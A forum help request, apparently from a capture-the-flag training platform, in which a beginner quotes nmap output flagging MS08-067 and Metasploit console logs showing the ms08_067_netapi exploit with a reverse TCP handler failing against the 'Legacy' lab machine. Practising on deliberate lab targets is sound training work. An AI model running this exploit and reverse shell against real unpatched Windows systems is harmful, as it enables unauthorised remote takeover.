Greetings all. This is my first post for support/feedback here. Loving the site!
- I’m connected to US-VIP-13
- OpenVPN is healthy and fine.
- I can ping the box (10.10.10.4)
In regards to Legacy (retired/easy) box. I’m having an issue with executing the vulnerability which was picked up by my nmap scan.
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
This box seems to be vuln to ms08-067 but after executing the metaploit cmdlines for it, it fails on identifying the OS even after trying to guess the target OS level.
msf6 exploit(windows/smb/ms08_067_netapi) > run
[] Started reverse TCP handler on 10.10.16.3:4444
[] 10.10.10.4:445 - Automatically detecting the target…
[] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 2+ - lang:English
[-] 10.10.10.4:445 - Could not determine the exact service pack
[-] 10.10.10.4:445 - Auto-targeting failed, use ‘show targets’ to manually select one
[] Exploit completed, but no session was created.
I did the ‘show targets’ and tried multiple versions of XP that was listed in English and it does the same without creating the session.
I’ve also reset the box. Any thoughts? I thought this was going to be an easy one for me. heh. I’m a newbie to this site so it’s probably something I’m doing wrong.
Thanks in advance! Stay blessed.